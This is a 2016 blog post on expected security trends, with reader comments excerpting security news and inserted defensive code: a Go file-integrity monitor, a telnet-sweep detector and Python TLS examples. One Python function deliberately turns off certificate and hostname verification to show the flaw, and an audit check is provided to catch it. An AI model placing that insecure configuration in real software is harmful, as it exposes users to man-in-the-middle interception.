Security trends for 2016

Here are my predictions for trends in information security and cyber security for year 2016.

Year 2015 was pretty bad for information security, and I would say that the trend is worrying. So I expect the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 there were airplanes hacked, cars hacked, and vulnerabilities found in a breathtaking range of sensitive equipment, from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016 and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.

Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and identifying the target can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders, and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.

EU information security decisions made in late 2015 will have an impact on what comes in 2016: the new EU data protection legislation package was approved, and the EU Court of Justice ruled that the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under Safe Harbor are a violation of law – you need some other agreement for this. The situation will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.

After the huge number of user information leaks in 2015 from all kinds of Internet services, cloud companies will face challenges in gaining trust in their security. You might have just dared to trust “the right cloud services,” since from the traditional information security point of view they seem to have the main things in order, but the leaks have raised privacy issues.

New environments will bring new threats. New operating system versions mean that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important in 2016, as 5G networks will be critical infrastructure on top of which, for example, transport, industry, health care and new operators will set up their business around 2020.

The huge amount of information security information is becoming harder and harder to manage in 2016. A key problem with security revelations, as with all other news coverage, is the exponential growth of information. There is a variety of news summaries produced on a daily basis, but they are not enough to get a good picture of what is happening. There are bigger and smaller news items, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.

The old way of network security, focused on perimeter defense, is not enough in 2016. The old mantras “encrypt everything” and “secure the perimeter” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: if you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will, be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to the lock-and-key system of public key infrastructure, you will also need an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans for various kinds of breaches – with a strong focus on integrity.
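One concrete form of the “integrity solution that acts like an alarm” mentioned above is a file integrity baseline: hash the files you care about while the system is known-good, and alarm on any later modification, addition or removal. The Go program below is an added example written for this page, not code from the original post; the directory tree and file names it builds are constructed for the demonstration.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"sort"
)

// Baseline maps a file path (relative to the monitored root) to the hex SHA-256 of its contents.
type Baseline map[string]string

// Snapshot walks root and hashes every regular file it finds.
func Snapshot(root string) (Baseline, error) {
	b := Baseline{}
	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
		if err != nil {
			return err
		}
		if !info.Mode().IsRegular() {
			return nil // directories, symlinks and devices are not hashed
		}
		f, err := os.Open(path)
		if err != nil {
			return err
		}
		defer f.Close()
		h := sha256.New()
		if _, err := io.Copy(h, f); err != nil {
			return err
		}
		rel, err := filepath.Rel(root, path)
		if err != nil {
			return err
		}
		b[filepath.ToSlash(rel)] = hex.EncodeToString(h.Sum(nil))
		return nil
	})
	return b, err
}

// Alert describes one deviation from the trusted baseline.
type Alert struct {
	Path   string
	Change string // "modified", "added" or "removed"
}

// Compare returns every difference between the trusted baseline and the
// current snapshot, sorted by path so the output is stable.
func Compare(baseline, current Baseline) []Alert {
	var alerts []Alert
	for path, oldSum := range baseline {
		newSum, ok := current[path]
		switch {
		case !ok:
			alerts = append(alerts, Alert{path, "removed"})
		case newSum != oldSum:
			alerts = append(alerts, Alert{path, "modified"})
		}
	}
	for path := range current {
		if _, ok := baseline[path]; !ok {
			alerts = append(alerts, Alert{path, "added"})
		}
	}
	sort.Slice(alerts, func(i, j int) bool { return alerts[i].Path < alerts[j].Path })
	return alerts
}

func main() {
	// Constructed demo: build a tiny "config" tree, baseline it, tamper with it, compare.
	root, err := os.MkdirTemp("", "fim-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(root)
	os.WriteFile(filepath.Join(root, "sshd_config"), []byte("PermitRootLogin no\n"), 0o644)
	os.WriteFile(filepath.Join(root, "hosts"), []byte("127.0.0.1 localhost\n"), 0o644)
	baseline, _ := Snapshot(root)
	// Simulated tampering: a weakened setting and an unexpected new binary.
	os.WriteFile(filepath.Join(root, "sshd_config"), []byte("PermitRootLogin yes\n"), 0o644)
	os.WriteFile(filepath.Join(root, "dropped.so"), []byte("\x7fELF"), 0o755)
	current, _ := Snapshot(root)
	for _, a := range Compare(baseline, current) {
		fmt.Printf("ALERT %-8s %s\n", a.Change, a.Path)
	}
}
```

The baseline itself must be stored somewhere the monitored host cannot rewrite, otherwise an intruder who can change the files can also change the hashes.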

Law enforcement versus Silicon Valley tension will continue to be strong throughout 2016. In 2015 law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes. Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that governments lie about encryption backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.

But this does not stop some government officials from demanding such things, with varying success in different countries. Another fact is that the existence of coded communications is a reality, and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access for government – i.e., a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals. Juniper’s VPN security hole is proof that government backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. A poorly thought-out and crude surveillance technique could have a devastating effect on a country’s internet security, as for example Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users to install a state-issued root certificate by January 1, 2016.

Google, Mozilla and Microsoft are pushing for an early SHA-1 crypto cutoff that could happen in 2016 instead of the earlier planned January 1st, 2017. This is due to recent research showing that SHA-1 is weaker than previously believed, because it has been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start displaying errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates at the end of 2016.

The use of blockchain technology, a permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will spread more widely than just Bitcoin virtual money. With bitcoin, the blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces with the Linux Foundation to create an alternative to the blockchain.

The use of disk encryption will increase, and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption in which the recovery keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or lose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security needs. The disadvantage of this approach is that your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.

Weak and leaked passwords are still a huge security problem in 2016. Passwords are often the weakest part when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering a code sent via text message to your phone – can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.

Google has begun testing a login system that uses phone notifications for authentication instead of passwords: users authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in, involving a push notification sent to your phone that then opens an app where you approve the log-in.

The smartphone will become a more and more security-critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”

Expect that the number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?

Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years, and I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP, as “there are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business- and mission-critical systems, both in private sector and government enterprises. For example, the US Navy is using the obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s completely the wrong approach to information security.

Cars were hacked at a record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars feature more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a five-star Cyber Safety Framework to mitigate this threat in cars; hopefully car component makers will study it.

IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms are not yet the weapon of choice for commercial malware authors – but businesses beware. Wearables won’t be safe either, as they are built using largely the same, too often vulnerable, technologies as other IoT systems. IoT security is still in its infancy in 2016.

Cyber criminals became more active in 2015, particularly in ransomware. The ransomware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily, and exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransomware I recommend making sure that your IT support or your service provider has the data backup and restore procedure operational, practiced and tested. You may need it in 2016 to get your data back without considering paying the criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.

Ransomware will continue to dominate in 2016, and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held to ransom with DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. The article Ransomware Is Coming to Medical Devices tells that according to a report released recently by Forrester Research, the number one cybersecurity prediction for 2016 is: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint.” Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.

2,232 Comments

  1. Tomi Engdahl says:

    Romanian ATM hacker exploits vulnerability in FENCE, escapes jail
    Robber clobbered but catching carder is harder
    http://www.theregister.co.uk/2016/03/08/romanian_atm_hacker_exploits_vulnerability_in_fence_escapes_jail/

    A Romanian carder arrested for using malware to plunder US$217,000 (£152,164, A$290,888) from ATMs has cut their way out of a Bucharest prison and escaped custody.

    Tulli and his gang raided ATMs maintained by NCR across Romania, Hungary, Spain, Russia, and the Czech Republic.

    They used the Tyupkin malware loading it onto ATMs using a CD slotted into the back of the machines.

    That malware has been upgraded in recent months and is now known as GreenDispenser and is being used to target ATMs across Mexico.

    ‘Self-deleting’ Mexican ATM malware let sneaky miscreants slurp cash
    Software nasty can be planted, operate and wipe itself all without detection
    http://www.theregister.co.uk/2015/09/25/mexican_atm_malware/

  2. Tomi Engdahl says:

    New Remaiten Malware Builds Botnet of Linux-Based Routers
    http://www.securityweek.com/new-remaiten-malware-builds-botnet-linux-based-routers

    Remaiten Linux Bot Targets Routers and Potentially Other Embedded (IoT) Devices

    A new piece of malware is targeting embedded systems with the mission to compromise and make them part of a botnet, ESET security researchers have discovered.

    Dubbed “Remaiten” (Linux/ Remaiten), the new threat combines the capabilities of previously spotted Tsunami (also known as Kaiten) and Gafgyt malware and also brings a series of improvements and new features. According to ESET, three versions of Remaiten have already emerged, while the malware authors call their creation “KTN-Remastered” or “KTN-RM.”

    One of the capabilities that Remaiten borrows from Gafgyt is telnet scanning, though Remaiten enjoys a series of improvements, ESET’s Michal Malik explains in a blog post. Both, however, rely on improperly secured devices to successfully infect them.

    Gafgyt attempts to connect to random routers via port 23, which it then issues a shell command to download bot executables for multiple architectures and tries to run them.

    The bot binaries include a hardcoded list of C&C server IP addresses, and the malware chooses one at random and connects to it on a hardcoded port (the port is different from one variant to another). Upon successful connection to the C&C server, the bot checks-in on the IRC channel, and the server replies with a welcome message and further instructions.

    There are various IRC commands that the bot supports

    Meet Remaiten – a Linux bot on steroids targeting routers and potentially other IoT devices
    http://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/

    ESET researchers are actively monitoring malware that targets embedded systems such as routers, gateways and wireless access points. Recently, we discovered a bot that combines the capabilities of Tsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions of Linux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware “KTN-Remastered” or “KTN-RM”.

    In this blog we will describe the unique spreading mechanism of Linux/Remaiten, its different features, and the differences between the versions found in the wild.

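The telnet-scanning behaviour described in the comment above (random hosts, port 23, then a download command) is something a defender can spot in outbound connection logs from their own network. The Go program below is an added example, not code from the article or from ESET: it parses a constructed key=value firewall log (the record format and the addresses are assumptions made for the demonstration) and flags any source that reached many distinct targets on port 23 within a short window.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// Event is one parsed outbound-connection record.
type Event struct {
	Time  time.Time
	Src   string
	Dst   string
	Dport string
}

// SampleLog is a constructed log: 192.0.2.10 behaves like an infected router
// sweeping port 23, while 192.0.2.20 is an admin host doing ordinary work.
var SampleLog = []string{
	"2016-03-30T10:00:01Z src=192.0.2.20 dst=198.51.100.5 dport=22",
	"2016-03-30T10:00:02Z src=192.0.2.10 dst=203.0.113.1 dport=23",
	"2016-03-30T10:00:02Z src=192.0.2.10 dst=203.0.113.2 dport=23",
	"2016-03-30T10:00:03Z src=192.0.2.10 dst=203.0.113.3 dport=23",
	"2016-03-30T10:00:03Z src=192.0.2.20 dst=198.51.100.9 dport=23",
	"2016-03-30T10:00:04Z src=192.0.2.10 dst=203.0.113.4 dport=23",
	"2016-03-30T10:00:04Z src=192.0.2.10 dst=203.0.113.5 dport=23",
	"2016-03-30T10:00:05Z src=192.0.2.10 dst=203.0.113.6 dport=23",
	"2016-03-30T10:00:40Z src=192.0.2.20 dst=198.51.100.9 dport=23",
	"2016-03-30T10:00:41Z src=192.0.2.10 dst=203.0.113.7 dport=80",
}

// ParseLine parses one "<RFC3339 time> src=... dst=... dport=..." record.
func ParseLine(line string) (Event, error) {
	fields := strings.Fields(line)
	if len(fields) < 4 {
		return Event{}, fmt.Errorf("malformed record: %q", line)
	}
	ts, err := time.Parse(time.RFC3339, fields[0])
	if err != nil {
		return Event{}, err
	}
	ev := Event{Time: ts}
	for _, kv := range fields[1:] {
		k, v, ok := strings.Cut(kv, "=")
		if !ok {
			continue
		}
		switch k {
		case "src":
			ev.Src = v
		case "dst":
			ev.Dst = v
		case "dport":
			ev.Dport = v
		}
	}
	if ev.Src == "" || ev.Dst == "" || ev.Dport == "" {
		return Event{}, fmt.Errorf("missing field in record: %q", line)
	}
	return ev, nil
}

// DetectTelnetSweeps returns, for every source that reached at least threshold
// distinct destinations on port 23 inside some window of the given length, the
// largest number of distinct targets seen in such a window.
func DetectTelnetSweeps(lines []string, window time.Duration, threshold int) map[string]int {
	bySrc := map[string][]Event{}
	for _, line := range lines {
		ev, err := ParseLine(line)
		if err != nil || ev.Dport != "23" {
			continue // unparseable records are skipped here; a real collector should count them
		}
		bySrc[ev.Src] = append(bySrc[ev.Src], ev)
	}
	hits := map[string]int{}
	for src, evs := range bySrc {
		sort.Slice(evs, func(i, j int) bool { return evs[i].Time.Before(evs[j].Time) })
		best := 0
		for i := range evs {
			// window anchored at event i: count the distinct targets it covers
			seen := map[string]bool{}
			for j := i; j < len(evs) && evs[j].Time.Sub(evs[i].Time) <= window; j++ {
				seen[evs[j].Dst] = true
			}
			if len(seen) > best {
				best = len(seen)
			}
		}
		if best >= threshold {
			hits[src] = best
		}
	}
	return hits
}

func main() {
	for src, n := range DetectTelnetSweeps(SampleLog, 30*time.Second, 5) {
		fmt.Printf("ALERT possible telnet sweep from %s: %d distinct targets on port 23\n", src, n)
	}
}
```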
  3. Tomi Engdahl says:

    New Dripion Backdoor Powers Targeted Attacks in Taiwan
    http://www.securityweek.com/new-dripion-backdoor-powers-targeted-attacks-taiwan

    Custom Backdoor Used in Targeted Attacks with Command and Control Servers Disguised as Antivirus Company Sites

  4. Tomi Engdahl says:

    Cyber Situational Awareness and the Kill Chain
    http://www.securityweek.com/cyber-situational-awareness-and-kill-chain

    The concept of the cyber kill chain has done a lot to advance the general understanding of how attacks unfold and how to combat them. The steps – reconnaissance, weaponization, delivery, exploitation, installation, command and control, actions on objectives – each have implications for how, as security professionals, we can strengthen our defenses. Initially these defenses concentrated on the network, and specifically the perimeter. But today, as attacks have increased in sophistication and frequency, it takes more to be a kill chain “killjoy.”

    Recent ESG research (“Threat Intelligence as part of Cyber Situational Awareness”) indicates that in response to growing threats, many organizations are investing in threat intelligence programs in order to track “in-the-wild” hacker activities and malware threats.

    Take for example, the first step in the kill chain – reconnaissance. An adversary surveys the target and seeks out weaknesses, potential vectors, and other information to assist with an attack. Organizations traditionally address this step in a number of ways, including firewall or proxy logs, honeypots and network-based intrusion detection systems (NIDS). But, unfortunately, these only aim to detect threats that directly target the perimeter network and fail to address other important threats, such as data that already found a way outside the organization through many different means

    In conjunction with the increased attack surface, there is also the threat landscape to consider and the range of actors who are potentially discussing plans regarding attacks against an organization. Hacktivists often do this publically, but criminals and nation states are much more covert.

    Reconnaissance is followed by weaponization. Depending on the type of threat you are dealing with, this can be anything from an easily available and simple to use exploit, up to the crafting and deployment of a zero-day vulnerability. Honeypots, sandboxes and NIDS all help to this end but, again, they only attempt to deal with the threats as they hit directly the organization, sometimes too little too late.

    Once the attack is launched and inside the network – the delivery, exploitation, installation, command and control, and actions on objectives stages – there are many effective security controls that help. But these can and should be supplemented with information from outside the organization to assess their effectiveness. For example, in the case of a Data Loss Prevention (DLP) solution, proxy or firewall, you need to be able to look outside of the organization to determine if the data these tools are trying to protect has been breached.

  5. Tomi Engdahl says:

    ‘Hack The Pentagon’ Bug Bounty Program Opens For Registration
    https://yro.slashdot.org/story/16/03/31/2013254/hack-the-pentagon-bug-bounty-program-opens-for-registration

    Starting today, security researchers can register to test their hacking skills against the Department of Defense (DoD) through “Hack the Pentagon,” a new bug bounty program that will award security researchers who discover vulnerabilities on the Pentagon’s public web pages.

    The initiative, run through a partnership with bug bounty platform provider HackerOne
    ‘Hack the Pentagon’ Pilot Program Opens for Registration
    DoD News, Defense Media Activity
    http://www.defense.gov/News-Article-View/Article/710033/hack-the-pentagon-pilot-program-opens-for-registration

  6. Tomi Engdahl says:

    Don’t be an April Fool.
    Be prepared. Back up your files on March 31st.
    http://www.worldbackupday.com/en/

    What is backup?

    A backup is a second copy of all your important files — for example, your family photos, home videos, documents and emails.

    Instead of storing it all in one place (like your computer), you keep another copy of everything somewhere safe.

    But why should I backup?

    Losing your files is way more common than you’d think.

    Ever lost your phone, camera or tablet? That counts. Your stuff could have been saved with a backup.

    One small accident or failure could destroy all the important stuff you care about.

    So how do I backup?

    Most people backup their files in one of two ways: to an external drive, or somewhere on the Internet.

    It’s really easy, and you only need to set it up once!

  7. Tomi Engdahl says:

    The Strange Origins of TrueCrypt, ISIS’s Favored Encryption Tool
    http://www.newyorker.com/news/news-desk/the-strange-origins-of-truecrypt-isiss-favored-encryption-tool

    On Tuesday, the Times reporter Rukmini Callimachi published the latest in a series of blockbuster stories about the inner workings of the Islamic State. The piece focussed on the logistics of the group’s deployment of terrorists in Europe, but also included a significant revelation in an ongoing debate about encryption. In ISIS’s training and operational planning, Callimachi reported, the group appeared to routinely use a piece of software called TrueCrypt. When one would-be bomber was dispatched from Syria to France, Callimachi writes, “an Islamic State computer specialist handed him a USB key. It contained CCleaner, a program used to erase a user’s online history on a given computer, as well as TrueCrypt, an encryption program that was widely available at the time and that experts say has not yet been cracked.”

    TrueCrypt and programs like it were the primary means for securing files and disks by those with a privacy bent of whatever stripe. Free to download and relatively user-friendly, TrueCrypt has been considered by experts to be among the strongest file-encryption programs available, since its release in 2004.

    Without the user’s password, the software has long been viewed as uncrackable. Included in the information that Edward Snowden provided to Glenn Greenwald, Laura Poitras, and other reporters in 2013 was a document showing that the National Security Agency had “major problems” breaking TrueCrypt.

    The genesis of TrueCrypt turns out to be as full of intrigue as the uses of it. The encryption software came up in my own reporting, in a story I’ve been researching for two years about a programmer named Paul Le Roux, who built a global drug, arms, and money-laundering cartel out of a base in the Philippines.

    Both E4M and its progeny, TrueCrypt, are “open source” software. Their code is available to anyone to examine or to build upon, with some restrictions. The developers who expanded upon E4M to improve and maintain TrueCrypt over the years have remained anonymous. “The origin of TrueCrypt has always been very mysterious,”

    In May, 2014, however, the anonymous developers behind TrueCrypt abruptly announced on their Web site that they would no longer support—or vouch for the security of—the software. Theories abound in the encryption community as to why

    TrueCrypt shows is how impractical those back doors and requests are. TrueCrypt is an open-source program, maintained by mysterious, anonymous developers who are generally assumed to be outside the U.S. They likely have no legal incentive to help any government, and every practical incentive not to.

    We now know that the original creator of E4M was not a company looking to curry favor with the U.S. government, but a man who went on to become one of its most wanted criminals. Negotiating back doors with such developers is almost certainly not an option. And TrueCrypt is just one of many open-source encryption programs available.

    In 2015, Green and some colleagues completed a security audit of TrueCrypt, concluding that, the developers’ shutdown notwithstanding, the software remained secure from back doors or cracking. ISIS certainly seems to think so.

    How ISIS Built the Machinery of Terror Under Europe’s Gaze
    http://www.nytimes.com/2016/03/29/world/europe/isis-attacks-paris-brussels.html?_r=0

  8. Tomi Engdahl says:

    PHP, Python and Google Go Fail To Detect Revoked TLS Certificates
    https://news.slashdot.org/story/16/04/01/0121226/php-python-and-google-go-fail-to-detect-revoked-tls-certificates

    Four years after the release of a groundbreaking study on the state of SSL/TLS certificates in non-browser applications (APIs [to be exact]), some programming languages fail to provide developers with the appropriate tools to validate certificates. Using three simple test scripts connected to a list of known vulnerable HTTPS servers, researchers logged their results to see which programming languages detected any problems.

    The Most Dangerous Code in the World:
    Validating SSL Certificates in Non-Browser Software
    https://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf

    The main lesson of this paper is that using SSL in non-browser software is a surprisingly challenging task. We demonstrated that even applications that rely on standard SSL libraries such as JSSE, OpenSSL, GnuTLS, etc. often perform SSL certificate validation incorrectly or not at all. These vulnerabilities are pervasive in critical software, such as Amazon FPS and PayPal libraries for transmitting customers’ payment details from merchants to payment gateways; integrated shopping carts; Amazon EC2, Rackspace, and other clients for remote administration of cloud storage and virtual cloud infrastructure; Chase mobile banking on Android; and many other popular programs. Their SSL connections are completely insecure against a man-in-the-middle attack.

  9. Tomi Engdahl says:

    “PHP, Python, and Google Go perform no revocation checks by default, neither does the cURL library. If the certificate was compromised and revoked by the owner, you will never know about it”

    Beware of Unverified TLS Certificates in PHP & Python
    By Peter Kankowski on March 31, 2016.
    https://blog.sucuri.net/2016/03/beware-unverified-tls-certificates-php-python.html

    Web developers today rely on various third-party APIs. For example, these APIs allow you to accept credit card payments, integrate a social network with your website, or clear your CDN’s cache. The HTTPS protocol is used to secure the connection with the API server. However, if your web app doesn’t verify the TLS certificate, a malicious person can steal your passwords or your customers’ credit card numbers.

    When implemented correctly, the TLS protocol provides both encryption and authentication. The connection between your server and the API server is encrypted using a symmetric cipher (typically AES) so an eavesdropper cannot read your data. The server also confirms its identity (authenticates itself) by sending an X.509 certificate to the client. The client must verify the certificate’s signature against the list of known root certificates, but this step is often neglected. As a result, a man-in-the-middle attack becomes possible.

    If you don’t verify the certificate, the attacker can masquerade as the API server, intercept data sent in both directions, or even return false messages that the API server never sent to you. This attack was previously discussed in the paper The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software by Martin Georgiev and others. The authors found that several API client libraries written in Java and PHP don’t verify the certificates correctly, so they are vulnerable to the attack.

    Reply
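Added example, not from the Sucuri post or the comment above: the two client configurations the post contrasts, written against Python's standard ssl module, plus a small audit function you can put in a test suite to catch a client library that quietly builds the unverified variant. Assumptions: Python 3.7 or newer; the live call at the bottom is optional and needs network access. The PHP/cURL equivalents are CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST, which must be left at their secure defaults.

```python
import socket
import ssl


def insecure_client_context() -> ssl.SSLContext:
    """The 'just make the warning go away' configuration.

    verify_mode=CERT_NONE skips chain validation and check_hostname=False
    skips the name check, so a man-in-the-middle presenting any certificate
    (self-signed, expired, issued for a different site) is accepted silently.
    check_hostname has to be cleared first: setting CERT_NONE while it is on
    raises ValueError.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def verified_client_context(cafile=None) -> ssl.SSLContext:
    """Chain validated against the system trust store (or, for an API you
    control, a pinned CA bundle passed as cafile), hostname checked, nothing
    older than TLS 1.2.

    What this still does NOT do: the ssl module performs no OCSP/CRL lookup by
    default, so a revoked certificate is accepted until it expires unless you
    load a CRL with load_verify_locations() and set VERIFY_CRL_CHECK_LEAF in
    ctx.verify_flags.
    """
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx: ssl.SSLContext) -> list:
    """Return the verification gaps of a context; an empty list is a pass."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode != CERT_REQUIRED: server chain is never validated")
    if not ctx.check_hostname:
        findings.append("check_hostname is False: a valid cert for any name is accepted")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum_version below TLS 1.2")
    return findings


def fetch_status_line(host: str, port: int = 443, ctx=None, timeout: float = 5.0) -> str:
    """Open a verified connection and return the HTTP status line.

    With a verified context an interposed proxy or a stolen/self-signed
    certificate makes wrap_socket() raise ssl.SSLCertVerificationError instead
    of silently handing the attacker the request and any credentials in it.
    """
    ctx = ctx or verified_client_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        # server_hostname drives both SNI and the hostname check
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
            return tls.recv(4096).decode("latin-1").split("\r\n", 1)[0]


if __name__ == "__main__":
    for name, ctx in (("insecure", insecure_client_context()),
                      ("verified", verified_client_context())):
        print(name, audit_context(ctx) or "OK")
    # Live check, network required: print(fetch_status_line("example.com"))
```

The audit is the part worth keeping: wrap whatever context your HTTP client or API SDK ends up using and assert that audit_context() returns nothing, so a future "verify=False" debugging shortcut fails the build instead of shipping.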
  10. Tomi Engdahl says:

    Patch Out For ‘Ridiculous’ Trend Micro Command Execution Vulnerability
    https://tech.slashdot.org/story/16/03/31/1725249/patch-out-for-ridiculous-trend-micro-command-execution-vulnerability

    A bug in its software meant that Trend Micro accidentally left a remote debugging server running on customer machines. The flaw, discovered by Google’s Project Zero researcher Tavis Ormandy, opened the door to command execution of vulnerable systems (running either Trend Micro Maximum Security, Trend Micro Premium Security or Trend Micro Password Manager).

    Patch out for ‘ridiculous’ Trend Micro command execution vuln
    Password Manager, Maximum Security and Premium Security are all at risk
    http://www.theregister.co.uk/2016/03/31/trend_micro_patches_command_execution_flaw/

    A bug in its software meant that Trend Micro accidentally left a remote debugging server running on customer machines

